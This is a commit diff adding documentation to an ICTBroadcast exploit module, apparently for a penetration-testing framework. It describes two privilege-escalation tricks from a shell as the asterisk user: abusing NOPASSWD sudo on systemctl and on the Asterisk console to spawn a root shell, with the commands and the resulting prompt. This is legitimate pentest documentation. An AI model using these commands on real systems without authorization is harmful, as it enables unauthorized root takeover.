Add LPE suggestions in documentation

Chocapikk · Chocapikk · commit 6ff04da954e6 · 2025-08-04T18:33:28.000+02:00
diff --git a/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md b/documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md
@@ -154,3 +154,27 @@ User asterisk may run the following commands on f7681361bd20:
     (root) NOPASSWD: /bin/systemctl
 bash-4.4$ 
 ```
+#### Low-hanging LPE via systemctl
+
+If `/bin/systemctl` is listed in sudo as NOPASSWD, you can escalate to root (outside Docker) via:
+
+```bash
+sudo systemctl 
+!sh
+```
+
+*Source: [https://gtfobins.github.io/gtfobins/systemctl/#sudo](https://gtfobins.github.io/gtfobins/systemctl/#sudo)*
+
+#### Low-hanging LPE via Asterisk NOPASSWD
+
+If `/usr/sbin/asterisk` is listed in sudo as NOPASSWD, you can obtain a root shell by:
+
+```bash
+  # 1) Start Asterisk as root, in foreground so it creates its CLI socket
+sudo asterisk -F
+
+  # 2) Connect to the Asterisk console and drop into a root shell
+sudo asterisk -r
+f7681361bd20*CLI> !sh
+sh-4.4#
+```
